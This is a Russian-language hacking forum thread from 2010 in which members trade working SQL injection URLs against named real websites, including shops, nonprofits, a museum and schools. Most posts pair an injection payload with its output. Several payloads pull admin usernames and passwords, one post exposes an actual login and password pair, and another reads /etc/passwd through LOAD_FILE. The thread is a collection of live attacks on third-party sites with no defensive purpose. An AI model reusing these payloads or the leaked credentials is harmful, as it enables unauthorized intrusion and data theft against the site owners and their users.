SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. CodeSender:)

    CodeSender:) Elder - Старейшина

    Joined:
    29 Jul 2010
    Messages:
    245
    Likes Received:
    115
    Reputations:
    23
    Code:
    http://www.tolive4ever.com/memorial.php?id=244&lang_id=1'+union+select+concat_ws(0x3a,database(),user(),version())+--+
    Database: tolive4ever
    User: [email protected]
    Version: 5.1.39-log
    PR: 3
    Доп. инфо: Шоп.
     
  2. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.pet-id.ru/index.php?ids=24&page=64+and+1=0+union+select+1,2,version()+--+
    4.1.21-log
    ТИЦ : 110

    http://www.ros-registr.ru/services.html?id=-41+UnIon+selECt+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13+from+information_schema.schemata+--+
    ТИЦ : 50

    http://www.rosprom.org/inf2.php3?id=5947+and+1=0+UnIon+selECt+1,group_concat(table_name+separator+'%3Cbr%3E'),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=0x6239363434+--+
    ТИЦ : 250
     
    #13042 tracy, 20 Sep 2010
    Last edited: 20 Sep 2010
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.wapler.net/index.php?id=502&gjd=19&ljd=4 and substring(version(),1,1)=3
    Code:
    http://www.waprotor.com/index.php?id=222&pos=-104 union select 1,2 from admins--
     
  4. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.chicagona.org/store/item_detail.php?item_id=-353+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14%20from%20mysql.user--&PHPSESSID=d931cea8e0796feb8a7f62deccfda2cc
    mysql.user

    Username: [email protected]
    Version: 4.1.22
    Database: narcoticsanonymous

    Google PR: 5
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.womex.com/realwomex/main.php?id_headings=112&id_realwomex=12+and+substring(version(),1,1)=3&subheading=119
     
    _________________________
    1 person likes this.
  6. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Code:
    http://www.tetis.ru/stat/art/count.php?id=-8+union+all+select+concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os)+--+
    PR: 5, ТИЦ: 1600
    Version: 4.1.21


    Code:
    http://sportland-club.ru/?page=-1+union+select+concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os)+--+
    PR: 4, ТИЦ: 300
    Version: 4.0.26


    Code:
    http://www.xfit.ru/news/number=258+and+1=2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8+--+
    PR: 3, ТИЦ: 325
    Version: 5.0.77-log
     
    #13046 brutos, 20 Sep 2010
    Last edited: 20 Sep 2010
  7. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.fcnl.org/issues/issue.php?issue_id=-76+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9+from+sup_people--
    Username: fcnlstaff@localhost
    Version: 5.0.77
    Database: fcnl

    Google PR: 6
     
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    http://www.echtenamen.de/kategorie.php4?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--
    ver. 4.1.22-MAX-LOG
    usr. V077244@LOCALHOST
    db. V077244
     
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.hvolsvollur.is/GetMynd.asp?aID=1202+and+1=@@version
    http://english.hestafrettir.is/PrentaFrett.asp?aID=1359+and+1=@@version
     
    _________________________
    #13049 Konqi, 20 Sep 2010
    Last edited: 20 Sep 2010
  10. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Joomla SQL-injection:

    Code:
    http://gsdk9.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1  ,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23
    http://classtv.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2  ,3,username,5,password,7,8,9,  10,11+from+%23__users%23
    http://www.sentimat.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,  3,username  ,5,password,7,8,9,10,11+from+%23__users%23
    http://alvitek.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0  +union+select+1,2,3,username,5,password,7,8,9,10,  11+from+%23__users%23
    http://cleanwin.org/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2 ,3,username,5,password,7,8,9  ,10,11 +from+%23__users%23
    http://www.euro-com.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23
     
    _________________________
    2 people like this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://minneapolis.institute.art.museum/viewer/detail.php?v=2&id=-3524+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+information_schema.schemata

    PR-7
     
    _________________________
  12. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    ТИЦ: 160
    PR: 6

    http://www.fulbright.org.ua/page.php?pid=-32+union+select+concat(name,char(58),pass)+from+auth+--+

    результат в исходнике- пример

    <TITLE>FULBRIGHT UKRAINE : olexad:fuldan</TITLE>
     
    #13052 Kusto, 21 Sep 2010
    Last edited: 21 Sep 2010
    2 people like this.
  13. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    админку не нашел :mad:

    http://www.tehnostudio.ru/index.php?cat=0xSGGPPP&df_sort=&newdf_value2=120+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(char(58),login,name,pwd,email,regdate,rkey)+from+RegUser+limit+0,1),1,64),floor(rand(0)*2)))z)--+
     
    _________________________
    2 people like this.
  14. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.bigboard.ru/ru/presscentr/nrnr/index.php?&id59=2428+UnIon+selECt+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16--
    4.1.22

    http://www.bigboard.ru/ru/presscentr/nrnr/index.php?&id59=2428+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,file_priv,10,11,12,13,14,15,16+from+mysql.user+where+user='root'--+
    file_priv=Y

    http://www.bigboard.ru/ru/presscentr/nrnr/index.php?&id59=2428+UnIon+selECt+1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16--
    Читалка
    ТИЦ : 60
     
  15. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    хз что за хеш тут выводится- сам не пойму

    http://www.international-school.org/page.php?pid=-3010+union+select+concat(login,char(58),password),2,3,4,5,6,7,8+from+users+limit+2,1+--+

    и админка http://www.international-school.org/page.php?pid=10000&dologin=1
     
    4 people like this.
  16. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87













     
    #13056 -PRIVAT-, 21 Sep 2010
    Last edited: 21 Sep 2010
    4 people like this.
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.laminaattekoop.nl/accessoires_artikel.php?id=24+and+substring(version(),1,1)=3
    http://newmee-perruque.com/fiche.php?id=125+and+substring(version(),1,1)=3--&type=3
     
    _________________________
    #13057 Konqi, 21 Sep 2010
    Last edited: 21 Sep 2010
    1 person likes this.
  18. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.ausgamers.com/events/?agn=view-event&id=-2041+UNION+SELECT+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20users--
    Username: [email protected]
    Version: 5.0.51a-log
    Database: agn_users

    Google PR: 6
     
    #13058 av1, 21 Sep 2010
    Last edited: 22 Sep 2010
    1 person likes this.
  19. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    шопы


    http://zaponok.net/tovar.php?id=-97+union+select+null+version()--

    http://www.promtracktor.ru/tovar.php?id=-2+union+select+1,database()--

    http://stanko-nct.ru/tovar.php?id=-136+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13--&PHPSESSID=d94ae1116d9d319ead85fd74284902ab

    http://www.ventasport.ru/tovar.php?id=-146+union+select+1,database%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

    http://qualitytv.ru/eshop/tovar.php?id=-138+union+select+1,2,3,version%28%29,5,6,7,8,9--

    http://chickenart.com.ua/shop/catalog.php?id=4+and+substring(version(),1,1)=5

    http://www.quiltersnet.ca/shop-item.php?id=30+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--
     
    #13059 Lilo, 21 Sep 2010
    Last edited: 22 Sep 2010
    1 person likes this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://raid-decouverte.com/roadster/voir_accessoire.php?id=-8+union+select+1,2,3,4,5
    http://www.legendes-motorcycle.com/productdetail.php?product=-218+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
     
    _________________________
Thread Status:
Not open for further replies.